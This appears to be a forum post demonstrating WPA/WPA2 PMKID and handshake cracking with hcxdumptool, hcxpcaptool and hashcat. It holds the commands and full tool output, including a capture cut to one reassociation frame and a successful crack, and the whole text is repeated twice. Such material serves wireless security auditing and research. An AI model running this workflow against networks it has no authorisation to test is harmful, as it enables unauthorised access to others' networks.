Here is an example running hcxdumptool-> hcxtools -> hashcat:
1) run hcxdumptool
2) get info about pcapng file
$ hcxpcaptool -o test.hccapx -k test.16800 hcxdumptool_dump.pcapng.gz
decompressing hcxdumptool_dump.pcapng.gz to /tmp/hcxdumptool_dump.pcapng.gz.tmp
reading from hcxdumptool_dump.pcapng.gz.tmp
summary:
file name........................: hcxdumptool_dump.pcapng.gz.tmp
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.37-2-ARCH
file application information.....: hcxdumptool 5.1.4
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
packets inside...................: 76658
skipped packets..................: 0
packets with GPS data............: 0
packets with FCS.................: 0
WDS packets......................: 7
beacons (with ESSID inside)......: 323
beacons (with MESH-ID inside)....: 3
probe requests...................: 2754
probe responses..................: 132
association requests.............: 2570
association responses............: 856
reassociation requests...........: 5831
reassociation responses..........: 705
authentications (OPEN SYSTEM)....: 7183
authentications (BROADCOM).......: 6607
authentications (APPLE)..........: 316
EAPOL packets (total)............: 55013
EAPOL packets (WPA2).............: 55013
PMKIDs (total)...................: 324
PMKIDs (WPA2)....................: 308
PMKIDs from access points........: 308
PMKIDs from stations.............: 16
EAP packets......................: 782
EAP START packets................: 6
EAP LOGOFF packets...............: 7
found............................: EAP type ID
found............................: EAP-SIM (GSM Subscriber Modules) Authentication
found............................: UMTS Authentication and Key Agreement (EAP-AKA)
best handshakes..................: 430 (ap-less: 277)
best PMKIDs......................: 66
430 handshake(s) written to test.hccapx
66 PMKID(s) written to test.16800
Now we remove all(!) packets except of one single reassociationrequest from hcxdumptool_dump.pcapng.gz to demonstrate the attack vector.
Improtant: There is no need to do this and you shouldn't clean a hcxdumptool pcapng file, otherwise you will loose many, many important informations (https://hashcat.net/forum/thread-6661-po...l#pid44872).
$ hcxpcaptool -k test.16800 single_frame.pcapng.gz
decompressing single_frame.pcapng.gz to /tmp/single_frame.pcapng.gz.tmp
reading from single_frame.pcapng.gz.tmp
summary:
file name........................: single_frame.pcapng.gz.tmp
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.42-1-ARCH
file application information.....: hcxdumptool 5.1.5
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
packets inside...................: 1
skipped packets..................: 0
packets with GPS data............: 0
packets with FCS.................: 0
reassociation requests...........: 1
PMKIDs (total)...................: 1
PMKIDs from stations.............: 1
best PMKIDs......................: 1
1 PMKID(s) written to test.16800
3) run hashcat
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-PMKID-PBKDF2
Hash.Target......: (removed)
Time.Started.....: Sat Jun 8 12:03:24 2019 (0 secs)
Time.Estimated...: Sat Jun 8 12:03:24 2019 (0 secs)
Guess.Base.......: File (wordlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 296.9 kH/s (6.34ms) @ Accel:16 Loops:512 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 86027/101041 (85.14%)
Rejected.........: 11/86027 (0.01%)
Restore.Point....: 57354/101041 (56.76%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Siegen002& -> olivia12345
Hardware.Mon.#1..: Temp: 53c Fan: 38% Util: 33% Core:1835MHz Mem:5005MHz Bus:16
Started: Sat Jun 8 12:03:22 2019
Stopped: Sat Jun 8 12:03:25 2019
1) run hcxdumptool
2) get info about pcapng file
$ hcxpcaptool -o test.hccapx -k test.16800 hcxdumptool_dump.pcapng.gz
decompressing hcxdumptool_dump.pcapng.gz to /tmp/hcxdumptool_dump.pcapng.gz.tmp
reading from hcxdumptool_dump.pcapng.gz.tmp
summary:
file name........................: hcxdumptool_dump.pcapng.gz.tmp
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.37-2-ARCH
file application information.....: hcxdumptool 5.1.4
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
packets inside...................: 76658
skipped packets..................: 0
packets with GPS data............: 0
packets with FCS.................: 0
WDS packets......................: 7
beacons (with ESSID inside)......: 323
beacons (with MESH-ID inside)....: 3
probe requests...................: 2754
probe responses..................: 132
association requests.............: 2570
association responses............: 856
reassociation requests...........: 5831
reassociation responses..........: 705
authentications (OPEN SYSTEM)....: 7183
authentications (BROADCOM).......: 6607
authentications (APPLE)..........: 316
EAPOL packets (total)............: 55013
EAPOL packets (WPA2).............: 55013
PMKIDs (total)...................: 324
PMKIDs (WPA2)....................: 308
PMKIDs from access points........: 308
PMKIDs from stations.............: 16
EAP packets......................: 782
EAP START packets................: 6
EAP LOGOFF packets...............: 7
found............................: EAP type ID
found............................: EAP-SIM (GSM Subscriber Modules) Authentication
found............................: UMTS Authentication and Key Agreement (EAP-AKA)
best handshakes..................: 430 (ap-less: 277)
best PMKIDs......................: 66
430 handshake(s) written to test.hccapx
66 PMKID(s) written to test.16800
Now we remove all(!) packets except of one single reassociationrequest from hcxdumptool_dump.pcapng.gz to demonstrate the attack vector.
Improtant: There is no need to do this and you shouldn't clean a hcxdumptool pcapng file, otherwise you will loose many, many important informations (https://hashcat.net/forum/thread-6661-po...l#pid44872).
$ hcxpcaptool -k test.16800 single_frame.pcapng.gz
decompressing single_frame.pcapng.gz to /tmp/single_frame.pcapng.gz.tmp
reading from single_frame.pcapng.gz.tmp
summary:
file name........................: single_frame.pcapng.gz.tmp
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.42-1-ARCH
file application information.....: hcxdumptool 5.1.5
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
packets inside...................: 1
skipped packets..................: 0
packets with GPS data............: 0
packets with FCS.................: 0
reassociation requests...........: 1
PMKIDs (total)...................: 1
PMKIDs from stations.............: 1
best PMKIDs......................: 1
1 PMKID(s) written to test.16800
3) run hashcat
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-PMKID-PBKDF2
Hash.Target......: (removed)
Time.Started.....: Sat Jun 8 12:03:24 2019 (0 secs)
Time.Estimated...: Sat Jun 8 12:03:24 2019 (0 secs)
Guess.Base.......: File (wordlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 296.9 kH/s (6.34ms) @ Accel:16 Loops:512 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 86027/101041 (85.14%)
Rejected.........: 11/86027 (0.01%)
Restore.Point....: 57354/101041 (56.76%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Siegen002& -> olivia12345
Hardware.Mon.#1..: Temp: 53c Fan: 38% Util: 33% Core:1835MHz Mem:5005MHz Bus:16
Started: Sat Jun 8 12:03:22 2019
Stopped: Sat Jun 8 12:03:25 2019